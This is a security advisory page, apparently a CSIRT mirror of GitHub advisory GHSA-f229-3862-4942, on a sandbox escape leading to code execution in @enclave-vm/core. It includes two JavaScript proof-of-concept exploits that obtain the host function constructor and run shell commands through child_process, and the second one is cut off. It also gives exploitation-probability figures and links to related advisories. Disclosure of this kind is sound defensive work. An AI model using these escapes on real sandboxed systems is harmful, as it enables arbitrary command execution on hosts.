GHSA-f229-3862-4942: @enclave-vm/core is vulnerable to Sandbox Escape
Summary
It is possible to escape the security boundraries set by @enclave-vm/core, which can be used to achieve remote code execution (RCE).
The issue has been fixed in version 2.11.1.
Details
It is possible to obtain the native Object constructor (instead of the SafeObject wrapper). This can be used to get retrieve property descriptors via Object.getOwnPropertyDescriptors, allowing access to properties otherwise restricted by the sandbox.
When a memory limit is set (which is the default), __host_memory_track, a host object, can be used to escape via the host function constructor.
When this is not the case, a host reference can be obtained via Node's nodejs.util.inspect.custom symbol (which can be triggered, for example, through console.log).
Proof of Concept
PoC 1
const { Enclave } = require("@enclave-vm/core");
const enclave = new Enclave({
securityLevel: "SECURE",
toolHandler: () => {},
});
const result = enclave.run(`
const op = {}[["proto"]];
const ho = op[["constructor"]];
const glob = ho.getOwnPropertyDescriptors(this);
return {
res: glob.host_memory_track__.value[["constructor"]]("return process")()
.getBuiltinModule("child_process")
.execSync("id")
.toString()
.split("\\n"),
};`);
result
.then((v) => console.log("success", v))
.catch((e) => console.log("failure", e));
PoC 2
const { Enclave } = require("@enclave-vm/core");
const enclave = new Enclave({
securityLevel: "STRICT",
toolHandler: () => {},
memoryLimit: 0,
});
const result = enclave.run(`
const op = {}[['proto']];
const ho = op[['constructor']];
const glob = ho.getOwnPropertyDescriptors(this);
const sym = glob[['Symbol']].value.for('nodejs.util.inspect.custom');
let result;
const obj = {
[sym]: (depth, option, inspect) => {
result = inspect[['constructor']]
[['constructor']]('return process')()
.getBuiltinModule('child_process')
.execSync('id')
Details
Original advisory: https://github.com/advisories/GHSA-f229-3862-4942
Exploitation outlook
EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.
- Low exploitation riskCVE-2026-275970.88% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 55% of all scored CVEs.
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-27597 | coverage & exploitation status | NVD · CVE.org |
More from GitHub Security Advisories
- criticalGHSA-g936-7jqj-mwv8: TSDProxy: Internal proxy auth token forwarded to backend services enables management API …2026-07-10
- highGHSA-fpg8-7664-jc5q: melange: Incomplete package integrity verification allows data section substitution2026-07-10
- mediumGHSA-48rx-c7pg-q66r: Excon does not redact additional sensitive/risky headers when following redirects2026-07-10
- highGHSA-h4g2-xfmw-q2c9: Clauster: Non-loopback deployments can serve the dashboard unauthenticated when auth.enab…2026-07-10
- mediumGHSA-rqq5-2gf9-4w4q: Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when giv…2026-07-10